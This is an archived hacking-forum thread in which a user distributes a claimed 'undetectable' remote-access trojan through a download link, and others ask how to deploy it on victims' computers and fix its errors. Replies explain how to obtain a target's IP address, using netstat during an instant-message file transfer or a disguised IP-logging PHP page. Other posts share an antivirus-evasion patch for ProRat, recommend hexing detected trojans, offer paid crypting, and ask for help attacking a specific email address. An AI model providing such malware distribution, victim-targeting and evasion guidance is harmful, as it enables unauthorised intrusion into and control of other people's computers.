PDA

View Full Version : Undetectable Trojan!

carlo
09-27-2005, 06:52 AM
After Creating a Telnet Trojan I advanced to crateing a normal UNDETECTABLE trojan. This is totaly imune to any av or firewall And you can get it from my sever here (http://cookielogger.t*5.com/Trojan.zip).

PLease note that this is for educational use only and do not abuse this ot pass it of as your own.

Thank you

Carlo

wasssa!?
10-03-2005, 03:00 PM
Carlo.....wasssa!?

I have a question...do you have to send a file to the "victim"? If so...which one is it??

carlo
10-04-2005, 10:50 AM
yes you must send them th sever.exe

maxattacxx
10-07-2005, 01:00 AM
I have a question let say "hypothetically" that you wanted to send this trojan to someones computer, and it definately got there... what exactly would be the prupose? I mean what does a trojan do exactly ? I'm not entirely sure what it does... ... I'm jsut wondering by the way...

Also what are the implications of using said trojan, it can't infect the sender can it?

And also, what is the worst possible thing you could do to someone who recieved a trojan from you, like damage wise, assuming they recieved it in an e-mail attachment....

carlo
10-07-2005, 10:53 AM
Lol dude just say it, it isnt like where going to judge you. This is a api trojan which only lets you send other files from your computer to his e.g a virus or a trojan hourse. If you sent him a trojan horse through it you can totaly take controll of his computer.

pYdO
10-08-2005, 12:29 AM
Downloaded it and getting an error message that says "Mswinsck.ocx or one of its dependencies is not correctly configured. What can i do?

carlo
10-08-2005, 07:11 AM
Yeah you dont have the visual basic runetime files. You can download them from microsoft.com.

rsyellowcard07
10-11-2005, 04:57 PM
of course u would have to have their IP address, correct?

carlo
10-12-2005, 11:00 AM
yeah all trojans have to.

pal
10-28-2005, 10:34 AM
so if you get their IP ady. and send them the Trojen then you can do anything with their files correct?

Gav021288
11-01-2005, 03:09 AM
When I try to download it the page doesnt come up!

franck_888
11-04-2005, 11:17 AM
if i get the ip of the other how i can send the file exe to him

davorcek
11-05-2005, 07:35 PM
Haay...Look...I sent sever.exe to target computer....and then i run client. But if i send any file to target box...the tell me runtime error "40006" .
What i must do?

carlo
11-06-2005, 01:08 PM
usualy this is due to the victims ip address or he is blocking your connection to it.

marcelo
11-29-2005, 10:53 AM
Carlos the telnet zip and the Trojan zip is not functioning, the Trojan opens but he does not function? what to make, it needs another program to function...?

After Creating a Telnet Trojan I advanced to crateing a normal UNDETECTABLE trojan. This is totaly imune to any av or firewall And you can get it from my sever here (http://cookielogger.t*5.com/Trojan.zip).

PLease note that this is for educational use only and do not abuse this ot pass it of as your own.

Thank you

Carlo

MrMicrosoft
11-29-2005, 03:48 PM
Thanks for the awsome trojan... Carlo. !

Great work u son of a hacker!

marcelo
11-29-2005, 08:08 PM
Carlos the Trojan zip is not functioning, I does not have the visual beginner's all-purpose symbolic instruction code, but the server he would have that to function, because I exactly tested in me... and nothing........ senão as I go to order server.exe and to ask for for vitima to install the visual beginner's all-purpose symbolic instruction code... rs

marcelo
11-29-2005, 08:09 PM
It forgives the error in the writing I am using a translator... I am Brazilian

osad
11-30-2005, 03:35 AM
this question was already asked but i dont think it was answered, is there a chance it can infect your computer?

carlo
11-30-2005, 10:45 AM
well the sever can infect your pc if you open the sever.exe. By the way to all your questions about this trojan. I am going to fix any bugs in it.

carlo

marcelo
11-30-2005, 11:12 AM
Carlo, I tested serve.exe it I am not infectando my PC I give error..... Serve.exe of the telnet also does not function.... Marcelo

well the sever can infect your pc if you open the sever.exe. By the way to all your questions about this trojan. I am going to fix any bugs in it.

carlo

wootn0w
12-01-2005, 05:13 PM
haha wrong trojan, i got error 424 with the telnet one and would love to fix it ttyl

markozavr
12-02-2005, 09:45 AM
hey carlo ur trojan has just one option to connect to the victim's pc?do u know any new undetectable trojans?and how can i know victim's ip?

wootn0w
12-02-2005, 04:25 PM
well if you using irc to find your fictim you can find it there.

also you could use a packet sniffer and see where the packet came from like over aim or so and that will show you your ip of the victim

saadn
12-02-2005, 07:06 PM
i have got the victims ip and i also got him to run the surver on his computer. the problem is when i run ConmtrlClient it gives a error message saying

"failed to load control 'commondialog' from comdlg*2.ocx. your version of comdlg*2 ocx may be outdated. make sure you are using the version of the conrol that was provided with your application"

i have downloaded comdlg*2.ocx and put it in my system directory and i also have installed it. it still gives me the same error message. ive tried restarting my pc but no difference.

bilalrouf
12-29-2005, 12:12 AM
Mr Carlo i would like to say that when you upload any kind of trogen eplane it also please.

wazzup973
01-05-2006, 02:22 AM
sorry if this has already been asked but whats the easiest way to get the targets ip?

Ezekiel
01-05-2006, 11:23 AM
Interesting. I haven't looked at it or sent it, and at the time have no intentions of doing so (at the time ;) ).

There's just 2 issues:

*) What if the victim has a router? Wouldn't that get in the way?

2) Many people don't have a Static IP. Wouldn't you have to get their IP again if it were to change?

*. Yes, a router will get in the way of any trojan, or anything that requires you on the other side of the router to initiate the connection, because routers block all incoming connections unless you forward the ports (requires router password), and because theres no way the router knows what internal computer in the netwrk to forward the connection to, so again, you have to forward the ports in the routers settings.

2. Yes, you would have to get it again. Most good trojans actually report the ip back to you when the victim is connected to the internet though, so thats not usually a problem if you plan on using other trojans.

sorry if this has already been asked but whats the easiest way to get the targets ip?

There are hundreds of ways to get the ip. Two of them are

*. Type (netstat -n) without brackets into command prompt. Then make a direct connection (send a file to make a direct connection) when talking on an instant messaging program, then while its sending bring up the command prompt (start - run then type cmd) then type
netstat -n
again. Try to see any new ip numbers on there that were not before. Ignore any ip numbers beginning with **2.*68 or *27.0.0.*, these are local ips and you want to look for remote ips. You should find one new one - thats their ip.

2. Make and host a php web page that will log any ip numbers that access it. Then simply tell them to visit that page, you could make it display an error message to not alert them to what the page was really for.

taqi
04-26-2006, 11:33 AM
carlo i download ur trogan and send server*.exe to target computer but when i start conmtrlclient.exe on my system error message appear (component'MSCOMCTL.OCX'or one of ita dependencies not correctly registered:a file is missing or invalid) now what can i do to solve this problem.thanx

Ezekiel
04-26-2006, 02:52 PM
carlo i download ur trogan and send server*.exe to target computer but when i start conmtrlclient.exe on my system error message appear (component'MSCOMCTL.OCX'or one of ita dependencies not correctly registered:a file is missing or invalid) now what can i do to solve this problem.thanx

Here is a solution I found from google:

To correct the error, first search your drive for MSCOMCTL.OCX to see if you have it. If not you can download it from HERE

The file should be placed in your C:\WINDOWS\SYSTEM directory. Or, if you are C:\WINDOWS\SYSTEM*2 if you are using WinXP.

Once it is there click START--> RUN and type "REGSVR*2 MSCOMCTL.OCX" (No quotes) in the box.

That should fix the problem.

HERE is http://www.majorgeeks.com/files/mscomctl.zip

But carlo made that a long time ago, and has said it is very basic and doesn't do much. Why don't you go learn how to create your own trojan?

null
05-03-2006, 02:03 PM
Lol dude just say it, it isnt like where going to judge you. This is a api trojan which only lets you send other files from your computer to his e.g a virus or a trojan hourse. If you sent him a trojan horse through it you can totaly take controll of his computer.
can you explain in alittle more detail to how you actually use this, i read the help guild but as most help guilds i come across its not much help. i know i might sound stupid but not everyone using this forums are intelligent, infact from half the posts i would rate 70 percent of them moronic. as you may rate me.. but anyways a little more info to how you can actually use this to send a trojan that wont be decected would be appreciated (do you have to attatch with a file? and if you do how do you do it... i would think you need to because just sending the trojan outright would bring attention and probably taken care of before it is even put into use) if you like to email or add my msn to speak of this more to a stupid kid that wants to learn more its themiddleman*********@hotmail.com. thank you for your time and im sorry if you find my post a waste of yours...

paknaz
07-06-2006, 07:24 PM
I think it is not good trojan
if you know little visual basic coding then you can find a complet eapplication from www dot palnet dash sources dash codes dot com

spymasterm
07-07-2006, 05:33 AM
Carlo,

Thanks for this great troj. Though I found that norton detects it...

Paknaz,

Where I can find this application you are talking about? the search didn't give me any of that kind.

carlo
07-07-2006, 12:49 PM
Man it has been a long time since i went on this forum. Err well im making a new trojan. So far it has 2 options. Send the victim a message and open and close cd-rom. But it will have alot more soon. In the meantime i would recomend you get a well known trojan that is detected and hex it.

Ciao

fariha
10-19-2007, 02:35 PM
This is an undetectable patch for ProRat *.* . You can make an undetectable server with this patch.

www.geocities.com/fariha_best007/install.zip

~~smart~fool~~
10-19-2007, 05:28 PM
Your a year late. Stop gravedigging old shit you spam bots.

Its_Me_Sash
10-23-2007, 07:01 AM
well since this is old download isnt available

anyone thatcan upload it again or a better one?

Besitos
04-05-2008, 06:36 PM
Hi carlo! The link doesn't work anymore :( would U email me and help me out with some doubts I have Plzzzzzzzzzzzzzzzzzzzzz!!! thanks Lips.kissable@**********:)

please help me
06-15-2008, 11:57 PM
Hi,

I need to send a trojen and stuff to this guy who ripped me off. Can someone help me by sending him some stuff. His address is hengwangtrade0*@hotmail.com

Thanks

gordo
06-16-2008, 06:42 AM
heh, just keep posting their email address (not here), they will get smothered in spam. ;)

sss3d
12-12-2008, 08:19 PM
These methods are obsolete. They will only protect it on scan time but when it's actually executed it will be caught, and when AV scans your computer it will delete it. The best way is to start from scratch and simply remove all signatures from the beginning. PM me, leave your msn, if you need a private one, or if you need your server hexed. It will cost of course.